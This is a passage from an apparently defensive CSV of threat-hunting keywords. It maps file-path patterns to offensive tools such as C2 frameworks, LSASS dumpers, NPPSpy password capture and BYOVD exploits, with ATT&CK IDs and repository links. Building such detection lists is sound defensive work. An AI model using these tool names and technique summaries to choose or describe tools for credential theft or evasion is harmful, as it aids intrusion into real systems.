Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\spellbound-main*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*\spellgen.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*\spellstager.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*\SpoofCmdLine\TheThing*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*\SprayAD.cna*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*\SprayAD.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*\SQLInfoDumps*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\SQLRecon*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*\stager.ps1*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*\start_campaign.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*\StayKit.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,0,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*\StolenPasswords.txt*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,0,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\Suborner.sln*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,0,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*\Supernova.exe*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*\Supershell.tar.gz*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*\Supershell\rssh\pkg\*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*\Supershell\rssh\pkg\*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*\system32.zip*,greyware_tool_keyword,ntdsutil,creating a full backup of the Active Directory database and saving it to the \temp directory,T1003.001 - T1070.004 - T1059,TA0005 - TA0003 - TA0002,N/A,N/A,Credential Access,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\systemic.txt,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*\TakeMyRDP*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation 
Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*\TASKSHELL.EXE*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,0,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z -*\teamserver-win.zip*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*\teamstracker.py*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,0,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*\Temp\*\ntds.dit*,greyware_tool_keyword,wmic,The NTDS.dit file is the heart of Active Directory including user accounts If it's found in 
the Temp directory it could indicate that an attacker has copied the file here in an attempt to extract sensitive information.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Temp\*\ntds.jfm*,greyware_tool_keyword,wmic,Like the ntds.dit file it should not normally be found in the Temp directory.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\TEMP\AteraUpgradeAgentPackage\*,greyware_tool_keyword,Atera,control remote machines- abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\temp\dump.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\Temp\dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,0,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*\temp\hollow.dll*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*\temp\pwned.trx*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\Temp\Reaper.exe*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*\Temp\RTCore64.sys*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*\TEMP\ScreenConnect\*.ps1*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\Temp\whoami.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*\tests\beacon64.bin*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*\TGSThief\*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,0,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*\the-backdoor-factory\*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*\ThemeBleed.exe *,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*\ThemeBleed.sln*,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*\TheThing.exe*,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*\TikiCompiler.txt*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\TikiService.exe*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to 
CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\TikiSpawn.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\tikispawn.xml*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\TikiTorch\Aggressor*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*\tir_blanc_holiseum\*.exe*,greyware_tool_keyword,tir_blanc_holiseum,Ransomware simulation,T1486 - T1204 - T1027 - T1059,TA0040 - TA0002 - TA0005,N/A,N/A,Ransomware,https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware,1,0,N/A,4,6,N/A,N/A,N/A,N/A -*\tmp\dll-collection*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*\TokenDump.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\tokenprivileges.c*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\tokenprivileges.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\Tokenvator\*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege 